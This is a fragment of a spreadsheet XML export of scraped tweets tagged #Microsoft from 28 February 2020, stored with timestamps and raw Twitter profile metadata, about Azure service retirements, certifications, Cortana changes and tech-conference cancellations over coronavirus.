    <t>{'id': 700264840414285825, 'id_str': '700264840414285825', 'name': 'Breaking the News 24/7', 'screen_name': 'Breaking24Seven', 'location': 'Vienna, Austria', 'description': 'Tweeting about #markets, #business, #politics and more... \nAccount of TeleTrader GmbH', 'url': 'https://t.co/sviZj3zShl', 'entities': {'url': {'urls': [{'url': 'https://t.co/sviZj3zShl', 'expanded_url': 'http://www.breakingthenews.net', 'display_url': 'breakingthenews.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11478, 'friends_count': 1034, 'listed_count': 114, 'created_at': 'Thu Feb 18 10:25:23 +0000 2016', 'favourites_count': 375, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 51495,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'http://pbs.twimg.com/profile_images/955848306038632454/imw8RE5t_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/955848306038632454/imw8RE5t_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/700264840414285825/1565278590', 'profile_link_color': 'D41C24',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</si>
  <si>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18:31:48 +0000 2020</t>
  </si>
  <si>
    <t>Migrate your IaaS resources to Azure Resource Manager by March 1, 2023 https://t.co/z059G5J53B  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>Fri Feb 28 18:31:47 +0000 2020</t>
  </si>
  <si>
    <t>Service Management REST APIs and support will be retired on November 1, 2021 https://t.co/maxJdihtMZ  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>Fri Feb 28 18:31:29 +0000 2020</t>
  </si>
  <si>
    <t>Some pre-curry drinks! @Laura_GB @marijnsomers @al_eardley @MattWeston365 @ScottishSummit #SS2020 #Office365 #Microsoft365 #MicrosoftTeams #SharePoint #PowerPlatform #Microsoft #Glasgow https://t.co/LejPLJ7PwA</t>
  </si>
  <si>
    <t>Fri Feb 28 18:30:35 +0000 2020</t>
  </si>
  <si>
    <t>#cybersecurity #infosec #microsoft     VIA @office365     Microsoft Security Partners (video)  https://t.co/5skvzqPvnZ</t>
  </si>
  <si>
    <t>#cybersecurity #microsoft #infosec     VIA @office365     Cloud App Security integrates with Windows Defender ATP(video) https://t.co/ROUnlKO8S7</t>
  </si>
  <si>
    <t>Fri Feb 28 18:30:16 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Edge can strip out adware #bundled with free #apps  here's how
https://t.co/OEUi8Im5T1</t>
  </si>
  <si>
    <t>Fri Feb 28 18:30:12 +0000 2020</t>
  </si>
  <si>
    <t>Any Business Central users that love March Madness? We have a special bracket just for you 
https://t.co/zysjflShF4
#Microsoft #MarchMadness #ERP #Basketball #Business #SMB #MSDyn365 #BusinessCentral #Games #Bracket #Bracketology | @Microsoft @MSDYN365BC https://t.co/voH0L8D6oq</t>
  </si>
  <si>
    <t>Fri Feb 28 18:30:10 +0000 2020</t>
  </si>
  <si>
    <t>#CRM Tip of the Day: Video Guide to 2020 Wave 1: New Kanban Visualization in Dynamics 365
https://t.co/TVVBKyPGHW
#Microsoft #MSDyn365 #Sales</t>
  </si>
  <si>
    <t>Fri Feb 28 18:30:03 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft drops Cortana consumer skills in new Windows 10 update https://t.co/Yh8TrWbeiJ via @GeekTech_App #geektech #technewsapp  #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 18:29:49 +0000 2020</t>
  </si>
  <si>
    <t>Service Management REST APIs and support will be retired on November 1, 2021
- Service Management REST APIs and support for Service Bus, Relay, and Event Hubs will be retired
https://t.co/iJCIkY8rwi
#Azure #Microsoft #Cloud #REST #APIs</t>
  </si>
  <si>
    <t>Fri Feb 28 18:29:46 +0000 2020</t>
  </si>
  <si>
    <t>These 5 mega #tech firms (#Microsoft , #Apple , #Google , #Amazon &amp;amp; #Facebook) dominate nearly every aspect of the global #digital #economy.They've a combined #market capitalization of $5.6 Trillion.They're too big to fail!
#startups #FridayThoughts #entrepreneur #StockMarket https://t.co/xtDB7WvcxR</t>
  </si>
  <si>
    <t>{'id': 947116735299072000, 'id_str': '947116735299072000', 'name': 'The Global Market Man', 'screen_name': 'globalmarketguy', 'location': 'Global', 'description': "A #globalcitizen ðŸ•Š in pursuit of infinite possibilities, in quest of answers and in search of the unknown.\nThe world is yours.ðŸ’ªðŸ¾\nLet's engage the world!ðŸŒðŸ’¡", 'url': 'https://t.co/9ymh9b0hSq', 'entities': {'url': {'urls': [{'url': 'https://t.co/9ymh9b0hSq', 'expanded_url': 'http://www.theglobalmarketman.com', 'display_url': 'theglobalmarketman.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 244, 'friends_count': 433, 'listed_count': 10, 'created_at': 'Sat Dec 30 14:46:41 +0000 2017', 'favourites_count': 736, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 475, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/947123103959678982/Tw0Ywe23_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/947123103959678982/Tw0Ywe23_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/947116735299072000/1538553572',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</si>
  <si>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18:26:57 +0000 2020</t>
  </si>
  <si>
    <t>Accelerate Your cloud strategy with Skytap on Azure
https://t.co/K20O4V7oPx
#Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC
https://t.co/JP46E6plpX
#Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone
https://t.co/BI3bJfgbsw
#Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Fri Feb 28 18:25:45 +0000 2020</t>
  </si>
  <si>
    <t>@verge So basically its something that looks like a laptop but isnt...copying is not a strategy #microsoft ahhaah</t>
  </si>
  <si>
    <t>{'id': 1041405000973537280, 'id_str': '1041405000973537280', 'name': 'Camille Oudinot', 'screen_name': 'OudinotCamille', 'location': 'Paris', 'description': 'Senior Strategic Designer/Service designer -SD&amp;M Graduate Parsons School of design (Master of Science)- Form, functionality and sense.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 985, 'friends_count': 1398, 'listed_count': 1, 'created_at': 'Sun Sep 16 19:14:35 +0000 2018', 'favourites_count': 109728, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 976, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1174690753911644163/J-nHTuwj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1174690753911644163/J-nHTuwj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1041405000973537280/1537125559',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</si>
  <si>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Migrate your IaaS resources to Azure Resource Manager by March 1, 2023
- Azure Resource Manager now has all the infrastructure as a service (IaaS) capabilities of Azure Service Management
https://t.co/u5hHsgLTtE
#Azure #Microsoft #Cloud #IaaS #ARM https://t.co/BVr4LL4gq0</t>
  </si>
  <si>
    <t>Fri Feb 28 18:25:03 +0000 2020</t>
  </si>
  <si>
    <t>Updates to Several Azure and Data &amp;amp; AI Certifications are Coming Soon
#Microsoft is currently finalizing the updates related to #Azure #Administrator, #Developer, #Architect, and #AI Engineer. 
Read more: https://t.co/mHNML6OcNK
Choose your Class: https://t.co/n6YnpjpbJv</t>
  </si>
  <si>
    <t>Fri Feb 28 18:23:52 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 18:22:03 +0000 2020</t>
  </si>
  <si>
    <t>Service Management REST APIs and support will be retired on November 1, 2021  https://t.co/urjrQF9lZU  #azure #microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 18:22:02 +0000 2020</t>
  </si>
  <si>
    <t>Migrate your IaaS resources to Azure Resource Manager by March 1, 2023  https://t.co/yb7pl6E8gb  #azure #microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 18:20:05 +0000 2020</t>
  </si>
  <si>
    <t>It's ok if your head has been in the clouds over -being- in the cloud, but only for so long. The cloud isn't only the future, but it's the now! We can help bring you back down to Earth. #Microsoft #MicrosoftBusinessSolutions #Cloud https://t.co/YwbNcHsND6 https://t.co/WflmykXUcf</t>
  </si>
  <si>
    <t>Fri Feb 28 18:20:03 +0000 2020</t>
  </si>
  <si>
    <t>Machine Learning and BIG Data Analytics on Microsoft AZURE 2020
#azure #bigdata #machinelearning #analytics #microsoft #
https://t.co/mOFkrWewbR</t>
  </si>
  <si>
    <t>Fri Feb 28 18:19:33 +0000 2020</t>
  </si>
  <si>
    <t>Service Management REST APIs and support will be retired on November 1, 2021 https://t.co/rcXwnKb0U3 #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Fri Feb 28 18:19:32 +0000 2020</t>
  </si>
  <si>
    <t>Migrate your IaaS resources to Azure Resource Manager by March 1, 2023 https://t.co/Qh0iONqwKE #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Fri Feb 28 18:15:06 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Migrate your IaaS resources to Azure Resource Manager by March 1, 2023
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/n64hBkj9Ee</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Service Management REST APIs and support will be retired on November 1, 2021
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/2MMAxF6s6r</t>
  </si>
  <si>
    <t>Fri Feb 28 18:15:05 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Learn: Why Get #Microsoft #Certified?
Experience is great, but how do you demonstrate your knowledge and skills to employers and colleagues? Certification.
Read more: https://t.co/12X4TDQuXL
Choose your Microsoft Role-based Class here: https://t.co/KUDra1s8Nx</t>
  </si>
  <si>
    <t>Fri Feb 28 18:14:22 +0000 2020</t>
  </si>
  <si>
    <t>@BLGDataResearch @HealthTech1 Hopefully #Microsoft this is just the start of such initiatives across different data dependent sectors that #AI and #DataAnalytics can deliver impact to differing yet dependent stakeholders and help drive #EconomicGrowth 
#Data2Life @ESRC @CBItweets @The_IoD @innovateuk @GOVUK</t>
  </si>
  <si>
    <t>{'id': 1095996487786471424, 'id_str': '1095996487786471424', 'name': 'Nigel Kirby24', 'screen_name': 'NKirby24', 'location': '', 'description': 'Project Management | Business Process Improvement | Workflow Modelling | Organisational Awareness | Analytical Thinking (all tweets are my own views)', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 35, 'friends_count': 14, 'listed_count': 0, 'created_at': 'Thu Feb 14 10:41:40 +0000 2019', 'favourites_count': 1049, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 914, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1095996710604754944/sUyBDTTp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1095996710604754944/sUyBDTTp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1095996487786471424/1580287732',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</si>
  <si>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18:10:12 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is retiring its MCSA, MCSD and MCSE certifications in June 2020 https://t.co/Q61z8s10ao #ZDNet #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 18:10:06 +0000 2020</t>
  </si>
  <si>
    <t>Did you know that 58% of data breaches take place at small businesses? Don't panicwe're here to help. Check out this infographic to see how our integrated #Microsoft security solutions can take your security measures to the next level. https://t.co/VczyHlsHGL</t>
  </si>
  <si>
    <t>{'id': 370932601, 'id_str': '370932601', 'name': 'Interlink Cloud', 'screen_name': 'interlinkcloud', 'location': 'Cincinnati, OH', 'description': 'The premier Cloud Advisor providing guidance to discover the extraordinary possibilities of the #MicrosoftCloud', 'url': 'http://t.co/nNUdOzfi1w', 'entities': {'url': {'urls': [{'url': 'http://t.co/nNUdOzfi1w', 'expanded_url': 'http://www.interlink.com', 'display_url': 'interlink.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 183, 'friends_count': 468, 'listed_count': 15, 'created_at': 'Fri Sep 09 22:07:10 +0000 2011', 'favourites_count': 148, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 653,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'http://pbs.twimg.com/profile_images/552902627055263744/J5JQ53YP_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/552902627055263744/J5JQ53YP_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/370932601/1449165779',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</si>
  <si>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18:10:05 +0000 2020</t>
  </si>
  <si>
    <t>Security Buzz: Now #Microsoft Wants To Secure Your iPhone via @Forbes https://t.co/xb2gWtKMsz #cybersecurity https://t.co/DwTw3eB8qa</t>
  </si>
  <si>
    <t>{'id': 1093266433, 'id_str': '1093266433', 'name': 'Entisys360', 'screen_name': 'Entisys360', 'location': 'Concord, Calif.', 'description': 'Entisys360 is an award-winning IT consultancy specializing in the deployment and delivery of advanced IT infrastructure, virtualization and cloud solutions.', 'url': 'https://t.co/wFL82sgKhW', 'entities': {'url': {'urls': [{'url': 'https://t.co/wFL82sgKhW', 'expanded_url': 'http://www.entisys360.com', 'display_url': 'entisys360.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2069, 'friends_count': 2962, 'listed_count': 248, 'created_at': 'Tue Jan 15 21:12:45 +0000 2013', 'favourites_count': 1602, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8460, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FF691F', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/724702140560613377/OZc-EpST_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/724702140560613377/OZc-EpST_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1093266433/1538148919', 'profile_link_color': 'ABB8C2',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</si>
  <si>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Feb 28 18:09:35 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/4d7vDf2UNV LIVE NOW!! Come and join me and my friends on minecraft!! Would love to see you there!! #SupportSmallStreamers #twitch #twitchtv #twitchstreamer #twitchaffiliate #minecraft #microsoft #ps4 #gaming #fun #gaming4life2020 #multiplayer #LIVENOW #OnAirNow</t>
  </si>
  <si>
    <t>Fri Feb 28 18:09:11 +0000 2020</t>
  </si>
  <si>
    <t>Service Management REST APIs and support will be retired on November 1, 2021: https://t.co/xsZxBV5cec #Azure #Microsoft</t>
  </si>
  <si>
    <t>Migrate your IaaS resources to Azure Resource Manager by March 1, 2023: https://t.co/9cQK1cEBHa #Azure #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 18:08:06 +0000 2020</t>
  </si>
  <si>
    <t>Daily Crunch: Facebook cancels F8 over coronavirus concerns https://t.co/haI4jp1K28 #Microsoft</t>
  </si>
  <si>
    <t>Amazon is the latest to ditch GDC this year https://t.co/oZE2EiSyDH #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 18:08:05 +0000 2020</t>
  </si>
  <si>
    <t>Microsofts Cortana drops consumer skills as it refocuses on business users https://t.co/Npqp6oYqMW #Microsoft</t>
  </si>
  <si>
    <t>Amid coronavirus fears, tech companies pull out of California conferences - Los Angeles Times #coronavirus #facebook #Microsoft #Facebook #sxsw #sxsw2020 @mayoradler @KXAN_News @statesman @KUT https://t.co/jhvouIq6jl</t>
  </si>
  <si>
    <t>{'id': 17758889, 'id_str': '17758889', 'name': 'Haley Schultheis', 'screen_name': 'HaleySchultheis', 'location': 'Austin, Texas', 'description': 'The Studio Digital / SEO + digital marketing + copy writer ðŸŒŒForever in pursuit of the extraordinary ðŸ”­', 'url': 'https://t.co/GBtdjm84HQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/GBtdjm84HQ', 'expanded_url': 'http://www.thestudiodigital.com', 'display_url': 'thestudiodigital.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3090, 'friends_count': 2602, 'listed_count': 194, 'created_at': 'Sun Nov 30 18:05:50 +0000 2008', 'favourites_count': 785, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 17435, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EDECE9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1113071272085413888/4mu_YhqE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1113071272085413888/4mu_YhqE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17758889/1515115630',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</si>
  <si>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Fri Feb 28 18:07:46 +0000 2020</t>
  </si>
  <si>
    <t>Dont miss out! Two videos out now! 
#rhino #rhinoceros #rhinogame #rhinogaming #rhinoplays #minecraft #survival #play #playoffs #microsoft #xbox #playstation #hash #hashtag #dankmemes #gamingmemes #perfectlycutscreams #perfection #youtuber #redstone https://t.co/xDCQJqyzSt</t>
  </si>
  <si>
    <t>Fri Feb 28 18:07:19 +0000 2020</t>
  </si>
  <si>
    <t>re: #Windows forcing users towards #Microsoft accounts &amp;amp; away from local ones
Showed up just now on power up, right after entering the user PW.
Advertises ""benefits"", bottom right button says "Let's go", bottom left "omit for now" (sic!).
Seriously?
@BleepinComputer https://t.co/cGYFlWNsIP</t>
  </si>
  <si>
    <t>{'id': 780185722481508352, 'id_str': '780185722481508352', 'name': 'Nine o Five â˜ƒ', 'screen_name': 'rusepony', 'location': 'New Lunar Republic', 'description': 'Long live counterculture, Rainbow Dash is best pony, FiWâ€ºMAS, nothing after ep50 is canon; Background by vest: https://t.co/phvAryhvvj; Profile pic @aemantaslim', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/phvAryhvvj', 'expanded_url': 'http://derpibooru.org/1003952', 'display_url': 'derpibooru.org/1003952', 'indices': [111, 134]}]}}, 'protected': False, 'followers_count': 108, 'friends_count': 903, 'listed_count': 1, 'created_at': 'Sun Sep 25 23:22:26 +0000 2016', 'favourites_count': 24368, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2662,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'http://pbs.twimg.com/profile_images/1119370384376311808/IKIawfyX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1119370384376311808/IKIawfyX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/780185722481508352/1517340592',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</si>
  <si>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18:05:06 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft pushing localization of games into French Canadian https://t.co/yYsDJqVGIG #Microsoft #Xbox #translation #localization #French @bradshankar</t>
  </si>
  <si>
    <t>{'id': 2742399626, 'id_str': '2742399626', 'name': 'Zab Translation', 'screen_name': 'ZabTranslation', 'location': '', 'description': 'We help our partners create the best global brand possible. We assist in translation and localization to ensure a successful market presences in any location.', 'url': 'http://t.co/5PD7IrAZ3a', 'entities': {'url': {'urls': [{'url': 'http://t.co/5PD7IrAZ3a', 'expanded_url': 'http://zabtranslation.com', 'display_url': 'zabtranslation.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 287, 'friends_count': 69, 'listed_count': 70, 'created_at': 'Mon Aug 18 16:33:27 +0000 2014', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2262,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'http://pbs.twimg.com/profile_images/1055969188928466954/L0MBa2kY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1055969188928466954/L0MBa2kY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2742399626/1427772532', 'profile_link_color': '33A457',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</si>
  <si>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18:02:35 +0000 2020</t>
  </si>
  <si>
    <t>Let's compare @Acumatica vs #Microsoft Dynamics 365 Business Central. Check the comparsion out here! https://t.co/O6BpU90139</t>
  </si>
  <si>
    <t>{'id': 70420298, 'id_str': '70420298', 'name': 'Donas Group', 'screen_name': 'donasgroup', 'location': 'Arlington Heights, IL', 'description': '', 'url': 'http://t.co/GSVsJpeK6E', 'entities': {'url': {'urls': [{'url': 'http://t.co/GSVsJpeK6E', 'expanded_url': 'http://www.donas.com', 'display_url': 'donas.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 53, 'friends_count': 53, 'listed_count': 2, 'created_at': 'Mon Aug 31 15:33:55 +0000 2009', 'favourites_count': 85, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 430,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'http://pbs.twimg.com/profile_images/1093620044716601344/h1K0-TJW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1093620044716601344/h1K0-TJW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/70420298/1549573102',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</si>
  <si>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Feb 28 18:02:20 +0000 2020</t>
  </si>
  <si>
    <t>I learned so much about instruction techniques. I now know what to expect for the CTT+ test. https://t.co/h39XFww6uc #microsoft #MCT https://t.co/DsyV6tNyx3</t>
  </si>
  <si>
    <t>Fri Feb 28 18:02:09 +0000 2020</t>
  </si>
  <si>
    <t>A huge thank you to our #DFSUserConference Diamond Sponsor, @Microsoft!
View the full schedule and register for the conference at https://t.co/BbPnLOozCZ #DoverFuelingSolutions #DFSUC20 #DigitalTransformation #Microsoft #MSPartner https://t.co/ND3TyfBtSS</t>
  </si>
  <si>
    <t>{'id': 814166979946971137, 'id_str': '814166979946971137', 'name': 'Dover FS', 'screen_name': 'DoverFS', 'location': '', 'description': 'DoverFS is a leading global provider of advanced customer-focused technologies, services, and solutions in the fuel and convenience retail industries.', 'url': 'https://t.co/WS2eEACnE3', 'entities': {'url': {'urls': [{'url': 'https://t.co/WS2eEACnE3', 'expanded_url': 'http://doverfuelingsolutions.com', 'display_url': 'doverfuelingsolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 722, 'friends_count': 115, 'listed_count': 1, 'created_at': 'Wed Dec 28 17:51:49 +0000 2016', 'favourites_count': 646, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1981,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'http://pbs.twimg.com/profile_images/814168589565427712/PtgqyAQJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/814168589565427712/PtgqyAQJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/814166979946971137/1582189656', 'profile_link_color': '002C76',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</si>
  <si>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18:01:40 +0000 2020</t>
  </si>
  <si>
    <t>Atlanta has been our city for over 20 years. Here are some events you can check out this weekend...
#atlanta #business #events #microsoft  
https://t.co/Fnkw6duExD</t>
  </si>
  <si>
    <t>{'id': 741601146545004544, 'id_str': '741601146545004544', 'name': 'StrategySol, LLC.', 'screen_name': 'strategysol', 'location': 'Atlanta, GA', 'description': 'Information Technology solutions with over 20 years of industry experience. We provide computer services to a variety of industries. Tweets by @JackieFeble.', 'url': 'https://t.co/Pef6TUq23B', 'entities': {'url': {'urls': [{'url': 'https://t.co/Pef6TUq23B', 'expanded_url': 'http://strategysol.com', 'display_url': 'strategysol.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 34, 'listed_count': 0, 'created_at': 'Sat Jun 11 12:01:06 +0000 2016', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 46, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1224404802387546113/2G-qzq4S_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224404802387546113/2G-qzq4S_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/741601146545004544/1580502651',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</si>
  <si>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18:00:46 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft #cloud  #Azure     Did you know migrating to Microsoft Azure can reduce your data center footprint 73%? Check out this infographic for an overview and contact Archon Security to learn more! https://t.co/TT5GWZzw1P</t>
  </si>
  <si>
    <t>Fri Feb 28 18:00:38 +0000 2020</t>
  </si>
  <si>
    <t>We're headed to Pennsylvania on March 19th for a #Microsoft Security CIE! 
Join us to learn how @Microsoft365 Security Solutions can better protect users, applications, businesses &amp;amp; more. 
Sign up: https://t.co/8pF94k4xkA
@Microsoft #MicrosoftPartner #security #IT #tech https://t.co/9hEoERe1v0</t>
  </si>
  <si>
    <t>Fri Feb 28 18:00:29 +0000 2020</t>
  </si>
  <si>
    <t>Announcing Power BI APIs .NET SDK v3
https://t.co/iiSMvzzppj
#Microsoft #PowerBI #DataAnalytics</t>
  </si>
  <si>
    <t>Fri Feb 28 18:00:07 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Our conference calendar is filling up!  Who else is attending the #Microsoft Business Applications Summit?  We hope to see some of you in #Dallas in May.  https://t.co/57jqDDkRCr
#powerplatform #powerapps #powerautomate #powerbi #theincworxway #conference https://t.co/WDvVHgZXJw</t>
  </si>
  <si>
    <t>Fri Feb 28 18:00:02 +0000 2020</t>
  </si>
  <si>
    <t>"The #Microsoft #HoloLens2 Has Become the New #AR Glasses Standard" https://t.co/OkClpskAuy</t>
  </si>
  <si>
    <t>{'id': 145064367, 'id_str': '145064367', 'name': 'Chad Adams - ðŸ‡ºðŸ‡²', 'screen_name': 'chadradams', 'location': 'Kansas City, MO', 'description': 'Principal User Experience Architect @Microsoft where I design/build cool stuff.  Working with the latest in tech, including @TypeScript, and @PowerBI.', 'url': 'https://t.co/dXrAUo47Fa', 'entities': {'url': {'urls': [{'url': 'https://t.co/dXrAUo47Fa', 'expanded_url': 'https://chadadams.com/', 'display_url': 'chadadams.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 86, 'friends_count': 10, 'listed_count': 8, 'created_at': 'Tue May 18 01:37:28 +0000 2010', 'favourites_count': 170, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 594, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '010101', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1220123349940146176/SMTN0x5q_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1220123349940146176/SMTN0x5q_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/145064367/1510027996', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'A0A5A1', 'profile_sidebar_fill_color': 'CFC8C0', 'profile_text_color': 'B5C27C', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 18:00:01 +0000 2020</t>
  </si>
  <si>
    <t>"Introducing Microsoft Codess Programm: Community for Female Developers" https://t.co/xEzvMAbtEo #microsoft #internship</t>
  </si>
  <si>
    <t>Fri Feb 28 17:59:02 +0000 2020</t>
  </si>
  <si>
    <t>GDC has lost 2 more participants because of coronavirus concerns!
#dgc #dgc2020 #microsoft #epicgames #coronavirus #gaming #gamingindustry #gamedev #gamebuz
https://t.co/Cc3l2rZkrJ https://t.co/VKjB3e8k9b</t>
  </si>
  <si>
    <t>{'id': 1088127164384333824, 'id_str': '1088127164384333824', 'name': 'GameBuz', 'screen_name': 'game_buz', 'location': '', 'description': 'GameBuz is a guild of enthusiastic wizards dedicated to presenting you the best PC, console and games news site, reviews, videos and entertaining articles', 'url': 'https://t.co/bb1sVYhaH0', 'entities': {'url': {'urls': [{'url': 'https://t.co/bb1sVYhaH0', 'expanded_url': 'https://www.gamebuz.co', 'display_url': 'gamebuz.co', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 724, 'friends_count': 2616, 'listed_count': 14, 'created_at': 'Wed Jan 23 17:31:47 +0000 2019', 'favourites_count': 81, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1462,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'http://pbs.twimg.com/profile_images/1108758833067888641/w3OS5H1W_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1108758833067888641/w3OS5H1W_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1088127164384333824/1569944564',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</si>
  <si>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17:57:25 +0000 2020</t>
  </si>
  <si>
